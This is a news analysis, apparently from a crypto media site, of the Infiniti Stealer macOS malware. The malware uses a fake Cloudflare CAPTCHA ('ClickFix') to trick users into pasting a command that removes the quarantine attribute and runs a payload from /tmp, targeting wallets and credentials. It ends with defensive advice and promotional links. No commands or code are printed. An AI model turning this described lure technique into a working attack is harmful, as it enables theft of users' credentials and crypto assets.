On March 30, 2026, the security agency GoPlus Security disclosed a new type of malware incident specifically targeting macOS users—Infiniti Stealer. Unlike traditional attacks that rely on technical vulnerabilities, this time, the attackers chose to disguise themselves as a Cloudflare CAPTCHA page that we encounter almost every day, guiding users to execute malicious commands locally through a seemingly “normal” security process. On the surface, it is an attempt to verify that you are not a robot, but in reality, it is gradually dismantling the system's defenses.

GoPlus Security's analysis points out that Infiniti Stealer's primary targets are encrypted wallets and various sensitive credentials (this conclusion currently comes from a single source and needs continuous verification), which means that the macOS territory, long considered “relatively secure,” is being systematically penetrated by organized attackers. For cryptocurrency users who are increasingly dependent on desktop wallets, browser plugins, and exchange logins, this is not just a system security incident but a signal redefining the “security boundary” in the era of cryptocurrency.

A Trapped Page Disguised as Cloudflare Verification

In this incident, the social engineering scenario named ClickFix serves as the entry point of the entire attack chain. When a user visits a website embedded with attack code, a highly realistic Cloudflare CAPTCHA interface pops up: the layout, copy, and branding are almost identical to the real experience, but the underlying logic has been quietly “replaced.”

Traditional Cloudflare verification usually involves clicking on images, checking boxes, or waiting for the browser to complete the check automatically, while ClickFix adds an extra step—prompting the user to copy a command that appears to “fix the local network/verification environment” and paste it into the macOS terminal to execute. For many users accustomed to copying commands from tutorials, this step does not automatically trigger suspicion; rather, it is seen as an “advanced user option.”

The key to social engineering is not to break through technical defenses but to rewrite users' understanding of security processes. The attackers understand that Cloudflare is synonymous with “safety” and “protection” in the minds of users, so they disguise malicious behavior under the trusted branding context, turning terminal operations that originally required technical barriers into “verification actions” voluntarily completed by users.

Compared to traditional phishing emails and fake login pages, the danger of this model lies in: it no longer requires users to step out of familiar online scenarios but instead seamlessly embeds itself into the daily browsing experience. You are still accessing a site that looks “normal,” still going through the “common” Cloudflare verification; only this time, the cost of verification is handing over system control.

A Streamlined Attack Chain to Take Down macOS in Two Steps

According to GoPlus Security's technical analysis, the attack chain of Infiniti Stealer has been condensed into two key steps, both streamlined and efficient, and capable of avoiding most risk signals perceptible by ordinary users. The first step is to remove the downloaded file's quarantine attribute on macOS via the command that was induced to be pasted into the terminal.

macOS automatically adds a quarantine tag to files downloaded from unknown sources or the internet to trigger extra verification or warnings. The command provided by ClickFix essentially helps attackers complete this “unlock” operation: once the quarantine attribute is removed, the default protective prompts from the system will weaken or disappear, allowing the malicious payload to be executed in a more “natural” way. This step, seemingly a “network issue fix” or “verification completion,” is fundamentally dismantling the first security barrier designed by Apple for ordinary users.

The second step involves writing the malicious payload into the /tmp directory and executing it quietly in the background. As /tmp is a temporary file directory, it does not stand out in most users' security instincts, but precisely because of this, unusual activities here are often hard to detect. The entire process lacks obvious pop-up warnings, and no further confirmation from the user is required, allowing the attack chain to close rapidly in these two steps.

The danger of this pathway lies in: once users complete that seemingly harmless “click” and paste action, there is almost no opportunity for human intervention. Traditional attacks often require multiple inducements or confirmations, while Infiniti Stealer folds all critical actions into a single terminal execution, minimizing the window for “hesitation” and “regret.”

Encrypted Wallets as Prey: Dual Exposure of Assets and Privacy

In the currently available information, GoPlus Security clearly states that the main targets of Infiniti Stealer are encrypted wallets and sensitive credentials, but this conclusion comes from a single source and requires further intelligence cross-verification. However, even with limited information, as long as the attack targets are within the scope of “cryptocurrency-related data,” their potential destructiveness is already sufficient to constitute systemic risk.

For ordinary cryptocurrency users, desktop wallets, exchange login credentials, browser-saved authentication information, and even offline stored recovery mnemonics can lead to direct financial loss if stolen: assets can be transferred instantly, cross-chain dumped, making the entire process extremely difficult to reverse. At the same time, these credentials are often tied to multi-platform accounts, allowing attackers to further use this identity data for secondary infiltration or extortion after the funds are stolen.

The deeper risk lies in long-term exposure. If mnemonic phrases are leaked, even if the current wallet balance is low, if new assets are transferred to the same address in the future, attackers can come back to “harvest” at any time. In the current reality where cross-border tracking and judicial collaboration efficiency are limited, the high liquidity and global transferability of crypto assets make such attacks highly cost-effective: once targeting high-net-worth users, the returns far exceed traditional information theft.

This is why cryptocurrency holders are increasingly viewed as priority targets for attackers. Compared to ordinary internet users, cryptocurrency participants often store a higher density of assets and keys on a single device, making the marginal return of successful attacks extremely high while the difficulty of accountability and recovery costs are significantly greater. This makes attacks like Infiniti Stealer, specifically targeting macOS and cryptocurrency scenarios, have clear economic motives.

The Myth of macOS Shattered: From System Myth to Asset Battleground

For a considerable time, the belief that “macOS is safer and less prone to viruses” was widely accepted as market consensus. Part of the reason is that macOS has a relatively small market share, making attackers more willing to focus their efforts on the Windows territory. However, recently, incidents of malware targeting macOS have shown an upward trend, and Infiniti Stealer is just one example, but enough to tear a corner off the myth.

As the cryptocurrency ecosystem expands, more funds and applications migrate from traditional financial systems to on-chain, the desktop becomes an important entry point for interacting with the chain. The popularity of cross-platform wallets, browser plugin wallets, and desktop client trading tools has led to a rapid increase in the value of on-chain assets carried by macOS devices. For attackers calculating the return on investment, it has become unprofitable to continue ignoring this group.

From an economic motivation perspective, attackers turning to macOS is not because they have discovered better technical vulnerabilities, but because this space gathers enough high-value targets: developers, early cryptocurrency investors, professional traders, users with high privacy requirements, etc. No matter how strong the default protections at the system level, they cannot offset the temptation brought by the high asset density of this group.

In this context, the “security boundaries” are being redefined: shifting from a past emphasis on “system protection”—relying on operating system sandboxes, signature verification, and permission management—to focusing on “asset and identity protection.” The sense of superiority of the operating system cannot replace the strict constraints on private key management, credential storage, and signing behaviors. The Infiniti Stealer incident serves as a reminder of a harsh reality: as long as your device carries enough on-chain value, there is no meaningful “secure system.”

Four Don'ts: Turning Security Awareness from Intuition to Rules

In response to the Infiniti Stealer incident, GoPlus Security released security recommendations centered around “4 Don'ts,” condensing technical details into behavioral guidelines: its essence is not to teach you how to run antivirus tools, but to urge users to refrain from blind trust and impulsive actions. In a world increasingly reliant on copying commands, quick clicks, and one-click authorizations, this “slow down” attitude itself is the most important defense.

With regard to the ClickFix scenario, the foremost rule is: do not randomly paste commands of unknown origin into the terminal. Whether it’s packaged as “fix network,” “bypass verification,” or “enhance performance,” if you do not fully understand what the command is doing, you should not execute it on production environment devices. Secondly, do not blindly trust abnormal verification processes—Cloudflare, Google, and exchange verification codes have relatively fixed interaction patterns; if a “verification method” requests you to open the terminal, download a script, or install additional tools, you should immediately terminate it.

For cryptocurrency users, the “4 Don'ts” also need to extend into an executable daily checklist:

● Manage download sources: Try to obtain wallets and tools from official sites, trusted mirrors, or open-source repositories, and do not install critical software through search ads or ad-hoc links on social media.

● Tighten browser plugin permissions: Regularly clean out unused wallet plugins and script extensions, close unnecessary data reading permissions, and avoid having “installed on a whim” plugins lingering in high-permission positions.

● Slow down every signing action: Whether it's DApp authorization, cross-chain bridge operations, or NFT listings, verify the domain name, contract, and amount before signing, treating each signing as a “possibly irreversible transfer.”

Only when these rules are solidified into muscle memory can the “4 Don'ts” proposed by GoPlus Security transform from mere reminders post-incident into a lifestyle habit that truly reduces the incidence of future attacks.

The Next Wave of Offense and Defense: From Vulnerability Contests to Mind Contests

What Infiniti Stealer reflects is a clear trend: attacks are shifting from purely technical vulnerabilities to finely manipulating user behavior and psychological expectations. ClickFix stands out not for its complex 0-day or kernel exploitation but for its utilization of the trust in Cloudflare's brand, the “black box” sensation of the terminal, and the users' urgency to “quickly pass verification” to achieve a flanking breakthrough of the macOS defenses.

Looking forward, the macOS community and the cryptocurrency industry need to form closer collaborations in threat intelligence sharing, security tools, and user education. On one hand, security agencies like GoPlus Security should continuously publish verifiable attack samples and technical analyses, allowing browsers, wallets, antivirus, and system-level security tools to update defenses more swiftly; on the other hand, wallet and trading platforms need to embed more anti-social engineering designs at the product level, such as abnormal interaction reminders and environmental risk scoring mechanisms.

For individual participants, beyond the price cycles between bull and bear markets, viewing “security habits” as an equally important long-term investment as asset allocation is transitioning from an option to a necessity. You can reduce your position at price peaks or make regular investments at lows, but once you relax your vigilance at the behavioral level, the hard-earned accumulated accounts and assets can easily be wiped out in a single copy-paste or erroneous signature.

The real defense lies not in the operating system, browser, or wallet but in the behavioral bottom line you set for yourself.

Join our community to discuss and become stronger together!
Official Telegram community: https://t.me/aicoincn
AiCoin Chinese Twitter: https://x.com/AiCoinzh

OKX Benefits Group: https://aicoin.com/link/chat?cid=l61eM4owQ
Binance Benefits Group: https://aicoin.com/link/chat?cid=ynr7d1P6Z

免责声明：本文章仅代表作者个人观点，不代表本平台的立场和观点。本文章仅供信息分享，不构成对任何人的任何投资建议。用户与作者之间的任何争议，与本平台无关。如网页中刊载的文章或图片涉及侵权，请提供相关的权利证明和身份证明发送邮件到support@aicoin.com，本平台相关工作人员将会进行核查。